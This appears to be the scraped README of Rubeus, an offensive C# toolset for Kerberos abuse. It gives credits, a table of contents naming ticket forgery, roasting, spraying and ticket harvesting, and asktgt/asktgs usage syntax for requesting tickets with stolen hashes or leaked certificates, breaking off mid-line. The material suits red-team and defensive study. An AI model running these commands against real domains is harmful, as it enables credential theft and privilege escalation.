GhostPack / Rubeus

Rubeus ---- Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is **heavily** adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist. Charlie Clark and Ceri Coburn have both made _significant_ contributions as co-developers to the Rubeus codebase. Elad Shamir contributed some essential work for resource-based constrained delegation. Their work is very appreciated! Rubeus also uses a C# ASN.1 parsing/encoding library from Thomas Pornin named DDer that was released with an "MIT-like" license. Huge thanks to Thomas for his clean and stable code! PKINIT code heavily adapted from @SteveSyfuhs's Bruce tool. Bruce made RFC4556 (PKINIT) a lot easier to understand. Huge thanks to Steve! NDR encoding and decoding for Kerberos PAC is based on the NtApiDotNet library from @tiraniddo, thank you James. The KerberosRequestorSecurityToken.GetRequest.aspx) method for Kerberoasting was contributed to PowerView (and then incorporated into Rubeus) by @machosec. @harmj0y is the primary author of this code base. Rubeus is licensed under the BSD 3-Clause license. Table of Contents• Rubeus• Table of Contents• Background• Command Line Usage• Opsec Notes• Overview• Weaponization• Example: Credential Extraction• Example: Over-pass-the-hash• Ticket requests and renewals• asktgt• asktgs• renew• brute|spray• Constrained delegation abuse• s4u• Ticket Forgery• golden• silver• diamond• Ticket Management• ptt• purge• describe• Ticket Extraction and Harvesting• triage• klist• dump• tgtdeleg• monitor• harvest• Roasting• kerberoast• kerberoasting opsec• Examples• asreproast• Miscellaneous• createnetonly• changepw• hash• tgssub• currentluid• logonsession• asrep2kirbi• kirbi• Compile Instructions• Targeting other .NET versions• Sidenote: Building Rubeus as a Library• Sidenote: Running Rubeus Through PowerShell• Sidenote Sidenote: Running Rubeus Over PSRemoting Background Command Line Usage ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.3 Ticket requests and renewals: Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID: Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256] Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID: Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256] Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session: Rubeus.exe asktgt /user:USER /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256] Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session: Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256] Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session: Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/suppenctype:DES|RC4|AES128|AES256] [/nowrap] Retrieve a TGT suitable for changing an account with an expired password using the changepw command Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/proxyurl:https://KDC_PROXY/kdcproxy] Request a TGT without sending pre-auth data: Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256] Request a service ticket using an AS-REQ: Rubeus.exe asktgt /user:USER /service:SPN [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256] Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket: Rubeus.exe asktgs [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy] Retrieve a service ticket using the Kerberos Key List Request options: Rubeus.exe asktgs /keyList /service:KRBTGT_SPN [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy] Retrieve a delegated managed service account ticket: Rubeus.exe asktgs /dmsa /opsec /service:KRBTGT_SPN /targetuser:DMSA_ACCOUNT$ [/dc:DOMAIN_CONTROLLER_Win2025] [/outfile:FILENAME] [/ptt] [/nowrap] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKE…